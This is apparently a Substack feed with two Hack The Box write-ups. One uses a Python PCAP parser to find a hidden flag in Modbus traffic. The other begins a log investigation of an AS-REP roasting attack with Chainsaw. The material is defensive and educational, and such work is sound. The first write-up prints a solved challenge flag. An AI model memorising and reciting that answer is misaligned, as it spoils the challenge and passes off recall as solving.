srcset="https://substackcdn.com/image/fetch/$s_!oGnN!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8362136-923c-4f92-9025-e4ef0fb22013_1920x910.png 424w, https://substackcdn.com/image/fetch/$s_!oGnN!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8362136-923c-4f92-9025-e4ef0fb22013_1920x910.png 848w, https://substackcdn.com/image/fetch/$s_!oGnN!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8362136-923c-4f92-9025-e4ef0fb22013_1920x910.png 1272w, https://substackcdn.com/image/fetch/$s_!oGnN!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8362136-923c-4f92-9025-e4ef0fb22013_1920x910.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!oGnN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8362136-923c-4f92-9025-e4ef0fb22013_1920x910.png" width="1456" height="690" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f8362136-923c-4f92-9025-e4ef0fb22013_1920x910.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:690,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:310601,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189515963?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8362136-923c-4f92-9025-e4ef0fb22013_1920x910.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!oGnN!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8362136-923c-4f92-9025-e4ef0fb22013_1920x910.png 424w, https://substackcdn.com/image/fetch/$s_!oGnN!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8362136-923c-4f92-9025-e4ef0fb22013_1920x910.png 848w, https://substackcdn.com/image/fetch/$s_!oGnN!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8362136-923c-4f92-9025-e4ef0fb22013_1920x910.png 1272w, https://substackcdn.com/image/fetch/$s_!oGnN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff8362136-923c-4f92-9025-e4ef0fb22013_1920x910.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>And we only left with this, not long after we found the flag on the Length of 123:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!v6GQ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd23a3395-d1f7-494c-9ce1-db406da1ddf7_1920x910.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!v6GQ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd23a3395-d1f7-494c-9ce1-db406da1ddf7_1920x910.png 424w, https://substackcdn.com/image/fetch/$s_!v6GQ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd23a3395-d1f7-494c-9ce1-db406da1ddf7_1920x910.png 848w, https://substackcdn.com/image/fetch/$s_!v6GQ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd23a3395-d1f7-494c-9ce1-db406da1ddf7_1920x910.png 1272w, https://substackcdn.com/image/fetch/$s_!v6GQ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd23a3395-d1f7-494c-9ce1-db406da1ddf7_1920x910.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!v6GQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd23a3395-d1f7-494c-9ce1-db406da1ddf7_1920x910.png" width="1456" height="690" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d23a3395-d1f7-494c-9ce1-db406da1ddf7_1920x910.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:690,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:278643,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189515963?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd23a3395-d1f7-494c-9ce1-db406da1ddf7_1920x910.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!v6GQ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd23a3395-d1f7-494c-9ce1-db406da1ddf7_1920x910.png 424w, https://substackcdn.com/image/fetch/$s_!v6GQ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd23a3395-d1f7-494c-9ce1-db406da1ddf7_1920x910.png 848w, https://substackcdn.com/image/fetch/$s_!v6GQ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd23a3395-d1f7-494c-9ce1-db406da1ddf7_1920x910.png 1272w, https://substackcdn.com/image/fetch/$s_!v6GQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd23a3395-d1f7-494c-9ce1-db406da1ddf7_1920x910.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>That&#8217;s basically it, but further enhancement we can create a Python script that in future could eliminate Length/Other filters as separator.</p><p>First let&#8217;s see the Headers, since it&#8217;s says PcapNG but let&#8217;s just see it first:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python">import sys
import struct

with open(sys.argv[1], 'rb') as f:
    data = f.read()

print(f"File size: {len(data)} bytes")
print(f"First 16 bytes: {data[:16].hex()}")

offset = 0
count = 0
while offset &lt; len(data) and count &lt; 20:
    if offset + 8 &gt; len(data):
        break
    block_type = struct.unpack_from('&lt;I', data, offset)[0]
    block_len  = struct.unpack_from('&lt;I', data, offset + 4)[0]
    print(f"offset={offset:#010x} block_type={block_type:#010x} block_len={block_len}")
    if block_len == 0:
        break
    offset += block_len
    count += 1</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo python3 dump.py traffic.pcapng
File size: 12778 bytes
First 16 bytes: d4c3b2a1020004000000000000000000
offset=0x00000000 block_type=0xa1b2c3d4 block_len=262146</code></pre></div><p>And yep, the file might be using a legacy PCAP format: magic d4c3b2a1 or a1b2c3d4, instead of PcapNG.</p><p>Let&#8217;s create the script following header of d4c3b2a1 which means little-endian classic PCAP.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python">#!/usr/bin/env python3
import sys
import struct
import argparse


def parse_pcap(filepath):
    packets = []
    with open(filepath, 'rb') as f:
        data = f.read()

    magic = struct.unpack_from('&lt;I', data, 0)[0]
    if magic == 0xa1b2c3d4:
        endian = '&lt;'
    elif magic == 0xd4c3b2a1:
        endian = '&gt;'
    else:
        print(f"Unknown magic: {hex(magic)}")
        sys.exit(1)

    offset = 24
    while offset &lt; len(data):
        if offset + 16 &gt; len(data):
            break
        incl_len = struct.unpack_from(endian + 'I', data, offset + 8)[0]
        orig_len = struct.unpack_from(endian + 'I', data, offset + 12)[0]
        pkt_data = data[offset + 16: offset + 16 + incl_len]
        packets.append((orig_len, pkt_data))
        offset += 16 + incl_len

    return packets


def extract_modbus_data(pkt_data):
    if len(pkt_data) &lt; 14:
        return None, None

    eth_type = struct.unpack_from('&gt;H', pkt_data, 12)[0]
    if eth_type != 0x0800:
        return None, None

    ip_offset = 14
    if ip_offset + 20 &gt; len(pkt_data):
        return None, None

    ihl   = (pkt_data[ip_offset] &amp; 0x0F) * 4
    proto = pkt_data[ip_offset + 9]

    if proto != 6:
        return None, None

    tcp_offset = ip_offset + ihl
    if tcp_offset + 20 &gt; len(pkt_data):
        return None, None

    tcp_data_offset = ((pkt_data[tcp_offset + 12] &gt;&gt; 4) &amp; 0xF) * 4
    src_port = struct.unpack_from('&gt;H', pkt_data, tcp_offset)[0]
    dst_port = struct.unpack_from('&gt;H', pkt_data, tcp_offset + 2)[0]

    if 502 not in (src_port, dst_port):
        return None, None

    payload_offset = tcp_offset + tcp_data_offset
    payload = pkt_data[payload_offset:]

    if len(payload) &lt; 8:
        return None, None

    transaction_id = struct.unpack_from('&gt;H', payload, 0)[0]
    protocol_id    = struct.unpack_from('&gt;H', payload, 2)[0]
    length         = struct.unpack_from('&gt;H', payload, 4)[0]
    unit_id        = payload[6]
    func_code      = payload[7]
    modbus_data    = payload[8:]

    info = {
        'transaction_id': transaction_id,
        'protocol_id':    protocol_id,
        'length':         length,
        'unit_id':        unit_id,
        'func_code':      func_code,
        'src_port':       src_port,
        'dst_port':       dst_port,
    }

    return info, modbus_data


def hexdump(data, indent=4):
    lines = []
    pad = ' ' * indent
    for i in range(0, len(data), 16):
        chunk = data[i:i+16]
        hex_part = ' '.join(f'{b:02x}' for b in chunk)
        asc_part = ''.join(chr(b) if 32 &lt;= b &lt; 127 else '.' for b in chunk)
        lines.append(f'{pad}{i:04x}  {hex_part:&lt;47}  {asc_part}')
    return '\n'.join(lines)


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('pcap')
    parser.add_argument('--threshold', '-t', type=int, default=90)
    parser.add_argument('--raw',   action='store_true')
    parser.add_argument('--ascii', action='store_true')
    args = parser.parse_args()

    packets = parse_pcap(args.pcap)

    if not packets:
        print('No packets parsed.')
        sys.exit(1)

    found = 0
    for idx, (frame_len, pkt_data) in enumerate(packets, start=1):
        if frame_len &lt;= args.threshold:
            continue

        info, modbus_data = extract_modbus_data(pkt_data)
        if info is None:
            continue

        found += 1
        direction = 'Query' if info['dst_port'] == 502 else 'Response'

        print('=' * 72)
        print(f'Packet #{idx}')
        print(f'  Frame Length   : {frame_len} bytes')
        print(f'  Direction      : {direction}')
        print(f'  Transaction ID : {info["transaction_id"]}')
        print(f'  Unit ID        : {info["unit_id"]}')
        print(f'  Function Code  : {info["func_code"]} (0x{info["func_code"]:02x})')
        print(f'  Modbus Length  : {info["length"]}')
        print(f'  Data Length    : {len(modbus_data)} bytes')

        if not args.raw and not args.ascii:
            print('  Hex Dump:')
            print(hexdump(modbus_data))
            printable = ''.join(chr(b) if 32 &lt;= b &lt; 127 else '.' for b in modbus_data)
            print(f'  ASCII          : {printable}')

        elif args.raw:
            print(modbus_data.hex())

        elif args.ascii:
            printable = ''.join(chr(b) if 32 &lt;= b &lt; 127 else '.' for b in modbus_data)
            print(f'  ASCII          : {printable}')

    print('=' * 72)
    if found == 0:
        print(f'No Modbus packets found exceeding {args.threshold} bytes.')
    else:
        print(f'Total anomalous packets found: {found}')


if __name__ == '__main__':
    main()</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ python3 dump.py traffic.pcapng
========================================================================
Packet #6
  Frame Length   : 275 bytes
  Direction      : Response
  Transaction ID : 1
  Unit ID        : 0
  Function Code  : 3 (0x03)
  Modbus Length  : 203
  Data Length    : 201 bytes
  Hex Dump:
    0000  c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0070  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0080  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0090  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00a0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00b0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00c0  00 00 00 00 00 00 00 00 00                       .........
  ASCII          : .........................................................................................................................................................................................................
========================================================================
Packet #29
  Frame Length   : 275 bytes
  Direction      : Response
  Transaction ID : 2
  Unit ID        : 0
  Function Code  : 3 (0x03)
  Modbus Length  : 203
  Data Length    : 201 bytes
  Hex Dump:
    0000  c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0040  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0070  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0080  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    0090  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00a0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00b0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    00c0  00 00 00 00 00 00 00 00 00                       .........
  ASCII          : .........................................................................................................................................................................................................
========================================================================
Packet #35
  Frame Length   : 123 bytes
  Direction      : Query
  Transaction ID : 12
  Unit ID        : 0
  Function Code  : 102 (0x66)
  Modbus Length  : 51
  Data Length    : 49 bytes
  Hex Dump:
    0000  00 10 2e 48 54 42 7b 35 30 6d 33 37 31 6d 33 35  ...HTB{50m371m35
    0010  5f 63 75 35 37 30 6d 5f 70 32 30 37 30 63 30 31  _cu570m_p2070c01
    0020  5f 34 32 33 5f 6e 30 37 5f 33 6e 30 75 39 68 37  _423_n07_3n0u9h7
    0030  7d                                               }
  ASCII          : ...HTB{50m371m35_cu570m_p2070c01_423_n07_3n0u9h7}
========================================================================
. . .[SNIP]. . .</code></pre></div><p>That&#8217;s it.</p><p>Happy Hacking!</p><ul><li><p><a href="https://github.com/byt3n33dl3">GitHub</a></p></li><li><p><a href="mailto:byt3n33dl3@proton.me">Mail</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[HTB Campfire-2 - DFIR (Very Easy)]]></title><description><![CDATA[Some mind game, that covering Kerberos case related in Infra based AD, identify some EventID related to Kerberos and No-PreAuth logon around AS-REP and another Roast attack, get comfy with Chainsaw.]]></description><link>https://byt3n33dl3.substack.com/p/htb-campfire-2-dfir-very-easy</link><guid isPermaLink="false">https://byt3n33dl3.substack.com/p/htb-campfire-2-dfir-very-easy</guid><dc:creator><![CDATA[Sulaiman]]></dc:creator><pubDate>Sat, 28 Feb 2026 16:21:10 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!5e8A!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b31285b-62ac-4d29-be33-55eaba5d403f_800x800.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!5e8A!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b31285b-62ac-4d29-be33-55eaba5d403f_800x800.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!5e8A!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b31285b-62ac-4d29-be33-55eaba5d403f_800x800.png 424w, https://substackcdn.com/image/fetch/$s_!5e8A!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b31285b-62ac-4d29-be33-55eaba5d403f_800x800.png 848w, https://substackcdn.com/image/fetch/$s_!5e8A!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b31285b-62ac-4d29-be33-55eaba5d403f_800x800.png 1272w, https://substackcdn.com/image/fetch/$s_!5e8A!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b31285b-62ac-4d29-be33-55eaba5d403f_800x800.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!5e8A!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b31285b-62ac-4d29-be33-55eaba5d403f_800x800.png" width="272" height="272" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2b31285b-62ac-4d29-be33-55eaba5d403f_800x800.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:800,&quot;width&quot;:800,&quot;resizeWidth&quot;:272,&quot;bytes&quot;:296697,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/189471558?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b31285b-62ac-4d29-be33-55eaba5d403f_800x800.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!5e8A!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b31285b-62ac-4d29-be33-55eaba5d403f_800x800.png 424w, https://substackcdn.com/image/fetch/$s_!5e8A!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b31285b-62ac-4d29-be33-55eaba5d403f_800x800.png 848w, https://substackcdn.com/image/fetch/$s_!5e8A!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b31285b-62ac-4d29-be33-55eaba5d403f_800x800.png 1272w, https://substackcdn.com/image/fetch/$s_!5e8A!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b31285b-62ac-4d29-be33-55eaba5d403f_800x800.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><em>From HTB:</em> Forela's Network is constantly under attack. The security system raised an alert about an old admin account requesting a ticket from KDC on a domain controller. </p><p>Inventory shows that this user account is not used as of now so you are tasked to take a look at this. This may be an AS-REP roasting attack as anyone can request any user's ticket which has preauthentication disabled.</p><p>Tools:</p><ul><li><p>Chainsaw</p></li></ul><p>Key Learning:</p><ul><li><p>Log Analysis</p></li></ul><h2>Task</h2><ol><li><p>When did the AS-REP Roasting attack occur, and when did the attacker request the Kerberos ticket for the vulnerable user</p></li><li><p>Please confirm the User Account that was targeted by the attacker.</p></li><li><p>What was the SID of the account?</p></li><li><p>It is crucial to identify the compromised user account and the workstation responsible for this attack. Please list the internal IP address of the compromised asset to assist our threat-hunting team.</p></li><li><p>We do not have any artifacts from the source machine yet. Using the same DC Security logs, can you confirm the user account used to perform the ASREP Roasting attack so we can contain the compromised account/s?</p></li></ol><p>Supposed this would be fun and manage-able, I believe if we&#8217;re doing this attack it would be count as easy as-well so we can have a-bit of psychological guess of how the attack went through.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ ll          
total 1248
-rw-r--r-- 1 root root 1118208 May 29  2024 Security.evtx</code></pre></div><p>All we got here at this case is a singular file, let&#8217;s hunt it first with Chainsaw and SIGMA rules and copy a convert to JSON file to make it easier:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ chainsaw hunt --sigma sigma --mapping sigma-event-logs-all.yml Security.evtx

 &#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9559;&#9608;&#9608;&#9559;  &#9608;&#9608;&#9559; &#9608;&#9608;&#9608;&#9608;&#9608;&#9559; &#9608;&#9608;&#9559;&#9608;&#9608;&#9608;&#9559;   &#9608;&#9608;&#9559;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9559; &#9608;&#9608;&#9608;&#9608;&#9608;&#9559; &#9608;&#9608;&#9559;    &#9608;&#9608;&#9559;
&#9608;&#9608;&#9556;&#9552;&#9552;&#9552;&#9552;&#9565;&#9608;&#9608;&#9553;  &#9608;&#9608;&#9553;&#9608;&#9608;&#9556;&#9552;&#9552;&#9608;&#9608;&#9559;&#9608;&#9608;&#9553;&#9608;&#9608;&#9608;&#9608;&#9559;  &#9608;&#9608;&#9553;&#9608;&#9608;&#9556;&#9552;&#9552;&#9552;&#9552;&#9565;&#9608;&#9608;&#9556;&#9552;&#9552;&#9608;&#9608;&#9559;&#9608;&#9608;&#9553;    &#9608;&#9608;&#9553;
&#9608;&#9608;&#9553;     &#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9553;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9553;&#9608;&#9608;&#9553;&#9608;&#9608;&#9556;&#9608;&#9608;&#9559; &#9608;&#9608;&#9553;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9559;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9553;&#9608;&#9608;&#9553; &#9608;&#9559; &#9608;&#9608;&#9553;
